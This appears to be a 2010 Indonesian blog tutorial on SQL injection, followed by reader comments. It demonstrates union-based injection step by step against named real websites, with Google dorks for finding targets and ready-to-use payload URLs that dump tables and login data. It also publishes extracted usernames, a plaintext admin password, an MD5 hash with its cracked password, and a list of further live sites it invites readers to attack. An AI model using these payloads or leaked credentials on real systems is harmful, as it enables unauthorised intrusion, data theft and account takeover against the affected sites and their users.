Sebelum Makan siang : SQL Injection?

Sahabat muda ;pencinta computer  kali ini saya akan sedikit membahas sql ijection , tidak hanya sebuah trick atau sekedar Ibarat tapi langsung  say kasih contoh common … Bro!

Pertama-tama anda searching di om google  kayak gini:

Inurl:”.php?id=”

Muncul  beberapa link langsung aja buka satu satu kali ini saya akan meng injeksi salah satu web di web itu juga ada forumnya ini alamatnya:

http://www.footballderbies.com/fans/index.php?id=33

terus kita coba ada bugsnya gak kasih tanda kutip dibelakang angaka 33

jadi :

http://www.footballderbies.com/fans/index.php?id=33

oke !, setelah dikasih tanda kutip web berubah sebagian isinya hilang, perlu anda ketahui ada sebagian web langsung mengularkan pesan error  , jadi intinya sama aja.

Next  sekarang kita coba tambah kan perintah

http://www.footballderbies.com/fans/index.php?id=33+ORDER+BY+100–

perintah ini untuk mengecek jumlah field di database dengan group yang sejenis saya kasih angka 100, karena saya yakin tidak field yang lebih dari seratus!,  nah kalau dikasih angka 100 tidak mau masih eror maka turunin angkanya.

Ujicoba di web ini seperti berikut ini:

http://www.footballderbies.com/fans/index.php?id=33+order+by+6–

nah diatas 6 masih juga muncul error , artinya field tidak lebih dari 6 field , Oke next kita inject d engan perintah union , yang fungsinya untuk melihat table lain yang dengan table tertentu kira2 seperti itu yang pernah say abaca kalau salah maaf  Ya..

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,6–

coba lihat dibagian header muncul angka 6 , lewat angka 6 inilah kita akan memasukan perintah Version(), user(), pertama kita chek apakah php ini versi 5 keatas atau 4 , kalau versi 4 maka lebih baik cari web yang lain he…he..

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,version()–

wowww… muncul tuch versi phpnya

versi : 5.0.27

next chek usernya:

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,user()–

User db:   footballderbies@localhost

Asyik semakin nyata kalau web ini bisa di inject dengan sql Oke  kita teruskan jalan-jalanya, sekarang kita lihat ada berapa table yang ada didatabase :

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()–

ha….ha…. banyak ya…. Tapi ambil aja table dengan nama : login_users,

kita coba cari tahu kolom apa aja yang ada di table login_user; ini perintahnya

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(column_name)+

FROM+information_schema.columns+where+table_name=0x6C6F67696E5F7573657273–

lihat link diatas pada bagian ujung ada seperi bilangan heksa mungkin ada yang Tanya dari mana angka itu?, Yups angka itu dihasilkan dari conver table login_user ke Heksa, jadi table yang  akan kita cari tahu nama kolomnya mula-mula di ubah ke heksa , jangan pusing gimana cara ngubahnya ini dia Linkny:

http://www.pl4y31286.0fees.net/tools/text/

Oke kita lanjut kelangkah selanjutnya nah saat nya kita mengambil nilai ditiap kolomnya  seprti

id,username,password, full_control

yang kita dapat dari table login_user coba kita masukan dikolom group_concat nya jadi seperti ini:

http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(id,’User ‘,username,’paswd ‘,password,’Hak_akses’,full_control)+FROM+login_users–

Yups ..link diatas sedikit saya modifikasi , dengan manambahkan string User, paswd dan hak akses  yang diapit kutip satu dan tujuan nya biar bacanya enggak ribet ada pemisah. Ha… ha…

Kalau udah monggo di ente apa yang terjaldi?, muncul lah apa yang kita mau.. !

Dan lihat field kolom 1 dengan akses control 1, wah ini pasti sang admin yang males.. he,,,,he… seperti brikut ini:

No  userna

No Username Password Hak akses
1 jordy Kudel1 1

Lihat passwordnya sama sekali tidak di encrypt ….!, oke nah tugas anda sekarang cari halaman loginya terus login dech,

Kenapa saya menyuruh karena saya tidak metemu halaman loginnya he… he…. , ketumunya halaman  login forumnya ,  langkahnya hamper sama kita conver t nama table phpbb_users , caranya sama kayak diatas sampe anda dapatkan user di forum itu, ?

Oke saya angap anda sudah pada bisa contoh saya akan masuk dengan salah satu user yang saya dapatkan:

No_field Status Ol username Password
21 1 Nobelhopper 20cf6628597a66ecc9de05d875dc87bb

Masalahnya Tuch password nya di encrypt dengan Md5, kenapa saya tahu yup emang standar yang dipake seperti itu, silahkan decrypt passwordnya tinggal searching di google , tapi bagi anda yang males nih link untuk mendecrypt Md5:

http://www.md5decrypter.co.uk/

nah dari hasil decrypt saya dapatkan dengan User login sbb:

Username:  Nobelhopper

Password:    210597ge

Oke sobat itulah sekilas sql injection , dan jika sobat mau nyoba silahkan uji wb ini:

Tapi saya mohon jangan di acak2nya ya, karena tutorial ini saya buat hanya sekedar pengetahuan agar kita lebih hati2 dan waspada terhadap segala kemungkinan: ini linknya:

http://www.itmaasia.com/news.php?id=1

Selamat Mencoba ya bro!

ini link yang pernah saya ujicoba jika belum di patch:

1. http://www.lpp.ac.id/politeknik.php?id=-30+UNION+SELECT+1,2,3,4,5,group_concat(user_id,user_name,user_pass),7,8,9,10,11,12,13+FROM+cni_user

2. http://www.itmaasia.com/news.php?id=-1+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–

8 responses to “Sebelum Makan siang : SQL Injection?

  1. rudex Juni 24, 2010 pukul 12:29 pm

    Wah nice banget nih bro infonya…

    Ok ane coba..

  2. EngCus Juni 28, 2010 pukul 4:57 pm

    mas rahmat yang paling gokiel…..gw newbie nih mau nanya..kalo misalnya setelah dikasih tanda petik tidak muncul pesan error..berarti gak bisa ya mas
    Mas ini kalo bikin tutorial yang lengkap donggg..
    jangan bikin orang tersesat….

  3. wiki Juli 14, 2010 pukul 10:45 am

    mas bisa buat absensi pegawai berbasis php dan database nya menggunakan Mysql…
    cz sya daoat tugas kntor niii…
    klo ad…
    q tlong buat in sriptnya aj….
    kirim via e-mail aj ya….
    di wiki.mafia@gmail.com
    tak tunggu…
    seblmnya mksiH…

    • jombi_par Agustus 19, 2010 pukul 7:41 pm

      bisa aja sich ,cuma authentifikasinya pake apa?, misalnya waktu-basensi, tanggal absensi, kemudian dari IP berapa yang bisa akses Komputer aplikasi webnya.
      intinya 1).gimana siuser hanya bisa melakukan absen satu kali saja dalam satu hari.
      2) Siuser yang melakukan absensi atau dilakukan oleh pihak Administrator 3).atau dengan finger print, (untuk finger print mungkin perlu sofware tambahan.

      * untuk korelasi(crm) databasesnya, relatif sederhana, tabel user, tabel rekap, tebel absen, tinggal tentukan primary yang akan dipakai Uniq fieldnya.thanks.

  4. ucup Agustus 11, 2010 pukul 9:55 am

    kang tau namanya table login_user dari mana kang

  5. linda Maret 21, 2013 pukul 4:02 pm

    Excellent post. I was checking constantly this blog
    and I am impressed! Very helpful info particularly the remaining phase🙂 I deal with such information a lot.
    I used to be looking for this particular info for a long time.
    Thank you and best of luck.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: